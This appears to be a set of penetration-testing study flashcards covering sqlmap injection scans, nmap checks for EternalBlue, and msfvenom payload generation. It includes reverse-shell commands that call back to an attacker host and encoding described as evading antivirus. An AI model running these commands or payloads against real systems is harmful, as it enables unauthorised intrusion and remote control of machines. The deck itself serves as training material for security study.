basics

Question 1

How do you use sqlmap?

Answer 1

1. attempt login to web server (e.g. username=admin, password=admin)
2. intercept with Burp
3. Copy and paste intercepted data into file (w/o spaces) named login.req
4. sqlmap -r login.req –level 5 –risk 3

Question 2

What is the MS Bulletin for eternalblue? What is the name in nmap?

Answer 2

• ms17-010

- smb-vuln-ms17-010

Question 3

What is the starting nmap command?

Answer 3

nmap -sV -sC -oA nmap-scripts 10.10.10.40

Question 4

What is the nmap command for specifically looking for Eternalblue?

Answer 4

nmap -p 445 –script safe -Pn -n 10.10.10.40

Question 5

MSFvenom: List available payloads

Answer 5

msfvenom -l payloads

Question 6

What is a Staged Payload?

Answer 6

• Staged payloads send a smaller stager to the target, which connects back to the attacker and downloads the rest of the payload.
• Staged payloads are denoted with the use of a forward slash (/; eg windows/shell/reverse_tcp)
• Staged payloads require special payload listeners, such as multi/handler in Metasploit
• Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows.

Question 7

What is a Stagless Payload?

Answer 7

• Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data.
• That means we have a variety of listeners we can use, such as Netcat
• Stageless payloads are denoted with the use of an underscore (_, eg windows/shell_reverse_tcp)

Question 8

What are the MSFvenom flags for Architecture and Platform?

Answer 8

• Architecture = -a

- Platform = –platform

Question 9

What is the MSFvenom flag for bad characters and what is an example of its use?

Answer 9

• Bad Characters = -b

- Example: -b ‘\x00\x0a\x0d\x20’

Question 10

What is the best and mot common encode for MSFvenom?

Answer 10

• x86/shikata_ga_nai
• In Japanese, means: “it cannot be helped”
• Reorders instructions and dynamically selects registers to encode our shellcode and get different output each time, making it harder for AV detection

Question 11

What is the MSFvenom flag to make with the lowest number of bytes?

Answer 11

–smallest

Question 12

What flag do you add onto the end of MSFvenom to fill out the remaining size of the shellcode with a NOP sled?

Answer 12

• NOP sled: -n

- Example: -n 20

Question 13

MSFvenom: Java Reverse Shell

Answer 13

msfvenom -p java/jsp_shell_reverse_tcp L HOST=? LPORT=? -f raw > shell.jsp

Question 14

MSFvenom: Windows Reverse Shell (Powershell)

Answer 14

msfvenom -a x86 –platform windows -p windows/powershell_reverse_tcp LHOST= LPORT= -f python

Question 15

MSFvenom: Windows Reverse Shell (Shell)

Answer 15

msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp LHOST= LPORT= -f python

Question 16

What is the command to start an Apache server?

Answer 16

• service apache2 start

Question 17

What is the command to watch access log data on the Apache server?

Answer 17

tail -f /var/log/apache2/access.log

Question 18

What is the command to watch connections being made on your tun0 interface?

Answer 18

tcpdump -i tun0